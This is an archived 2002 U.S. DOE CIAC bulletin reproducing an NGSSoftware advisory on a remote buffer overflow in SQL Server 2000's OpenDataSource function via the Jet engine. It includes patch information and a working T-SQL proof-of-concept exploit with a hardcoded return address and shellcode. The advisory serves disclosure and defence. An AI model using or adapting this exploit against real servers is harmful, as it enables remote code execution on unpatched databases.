__________________________________________________________
The U.S. Department of Energy
Computer Incident Advisory Capability
___ __ __ _ ___
/ | /_\ /
\___ __|__ / \ \___
__________________________________________________________
INFORMATION BULLETIN
Microsoft SQL Server 2000 OpenDataSource Buffer Overflow
[NGSSoftware Insight Security Research Advisory #NISR19062002]
June 20, 2002 21:00 GMT Number M-094
______________________________________________________________________________
PROBLEM: The SQL Server 2000 has a remotely exploitable buffer overrun
vulnerability in the OpenDataSource function. This exploit is
achievable when the SQL Server is combined with the Microsoft
Jet Engine. The exploit itself is caused by the Jet Engine.
PLATFORM: Microsoft SQL Server 2000
DAMAGE: By making a specially crafted SQL query using the
OpenDataSource function, it is possible to overflow a buffer in
the SQL Server process, therefore gaining remote control of the
SQL database.
SOLUTION: Upgrade to latest version of Jet. Please see Fix Information
section within bulletin.
______________________________________________________________________________
VULNERABILITY The risk is HIGH. If the SQL Server is running with SYSTEM
ASSESSMENT: privileges, this is default behavior, then any code supplied by
the attacker in an exploit of the overflow will run
uninhibited.
______________________________________________________________________________
LINKS:
CIAC BULLETIN: http://www.ciac.org/ciac/bulletins/m-094.shtml
ORIGINAL BULLETIN: http://www.nextgenss.com/advisories/mssql-ods.txt
PATCHES:
http://www.microsoft.com/windows2000/downloads/recommended/q282010/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D38002%26area%3Dsearch%26ordinal%3D2%26redirect%3Dno
______________________________________________________________________________
[***** Start NGSSoftware Insight Security Research Advisory #NISR19062002 *****]
NGSSoftware Insight Security Research Advisory
Name: OpenDataSource Buffer Overflow
Systems: Microsoft SQL Server 2000, all Service Packs
Severity: High Risk
Category: Remote Buffer Overrun Vulnerability
Vendor URL: http://www.microsoft.com/
Author: Mark Litchfield (mark@ngssoftware.com)
Contributor: David Litchfield (david@ngssoftware.com)
Advisory URL: http://www.ngssoftware.com/advisories/mssql-ods.txt
Date: 19th June 2002
Advisory number: #NISR19062002
VNA reference : http://www.ngssoftware.com/vna/ms-sql.txt
This advisory covers the solution to one of the problems mentioned in
the above VNA URL.
Description
***********
Microsoft's database server SQL Server 2000 has a remotely exploitable
buffer overrun vulnerability in the OpenDataSource function when combined
with the MS Jet Engine. Due to this being a JET problem other products may
also be vulnerable; however the fix for all products should be the same.
Please see the "Fix Information" section for more details.
Details
*******
By making a specially crafted SQL query using the OpenDataSource function it
is possible to overflow a buffer in the SQL Server process, gaining control
of its execution remotely. If the SQL Server is running with SYSTEM privileges,
this is default behaviour, then any code supplied by the attacker in an exploit
of the overflow will run uninhibited. Whilst the overflow is UNICODE in nature,
as will be shown, it is still very easy to exploit.
What must be stressed is that this may be launched via a web server application
if it is vulnerable to SQL Injection so just because no direct access can be
gained to the SQL Server from the Internet does not mean it is safe. All
customers running SQL Server should check their patch level.
Simple Proof of Concept
***********************
This Transact SQL Script will create a file called "SQL-ODSJET-BO" on the root
of the C: drive on Windows 2000 SP 2 machines
-------8<---------
-- Simple Proof of Concept
-- Exploits a buffer overrun in OpenDataSource()
--
-- Demonstrates how to exploit a UNICODE overflow using T-SQL
-- Calls CreateFile() creating a file called c:\SQL-ODSJET-BO
-- I'm overwriting the saved return address with 0x42B0C9DC
-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2
-- The address holds a jmp esp instruction.
--
-- To protect against this overflow download the latest Jet Service
-- pack from Microsoft - http://www.microsoft.com/
--
-- David Litchfield (david@ngssoftware.com)
-- 19th June 2002
declare @exploit nvarchar(4000)
declare @padding nvarchar(2000)
declare @saved_return_address nvarchar(20)
declare @code nvarchar(1000)
declare @pad nvarchar(16)
declare @cnt int
declare @more_pad nvarchar(100)
select @cnt = 0
select @padding = 0x41414141
select @pad = 0x4141
while @cnt < 1063
begin
select @padding = @padding + @pad
select @cnt = @cnt + 1
end
-- overwrite the saved return address
select @saved_return_address = 0xDCC9B042
select @more_pad = 0x4343434344444444454545454646464647474747
-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 -
Win2K Sp2
-- change if running a different service pack
select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538
D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC
select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',
''Data Source="c:\'
select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code
select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties
=Excel 5.0'')...xactions'
exec (@exploit)
------->8---------
Fix Information
***************
NGSSoftware alerted Microsoft to this problem on the 16th of May 2002 and after
investigation Microsoft recommend that customers should upgrade their version of
Jet. The latest version is available from here:
http://www.microsoft.com/windows2000/downloads/recommended/q282010/
default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3
FReleaseID%3D38002%26area%3Dsearch%26ordinal%3D2%26redirect%3Dno
A check for this vulnerability has been added to Typhon II, NGSSoftware's
vulnerability assessment scanner, of which, more information is available
from the NGSSite, http://www.ngssoftware.com/
Further Information
********************
For more information regarding SQL Injection please read
http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
and for more information about buffer overflows please read
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf
http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
[***** End NGSSoftware Insight Security Research Advisory #NISR19062002 *****]
_______________________________________________________________________________
CIAC wishes to acknowledge the contributions of NEXT GENERATION SECURITY
SOFTWARE LIMITED for the information contained in this bulletin.
_______________________________________________________________________________
CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.
CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193 (7x24)
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@ciac.org
Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.
World Wide Web: http://www.ciac.org/
Anonymous FTP: ftp.ciac.org
PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.
This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.
LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
M-085: IMAP Partial Mailbox Attritbute Buffer Overflow Vulnerability
CIACTech02-004: Parasite Programs; Adware, Spyware, and Stealth Networks
M-086: Sun SEA SNMP Vulnerability
M-087: SGI IRIX rpc.passwd Vulnerability
M-088: MS Unchecked Buffer in Gopher Protocol Handler
M-089: MS Heap Overrun in HTR Chunked Encoding Vulnerability
M-090: Microsoft Unchecked Buffer in RAS Phonebook Vulnerability
M-091: Microsoft Unchecked Buffer in SQLXML Vulnerability
M-092: Cisco Buffer Overflow in UNIX VPN Client
M-093: Apache HTTP Server Chunk Encoding Vulnerability
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
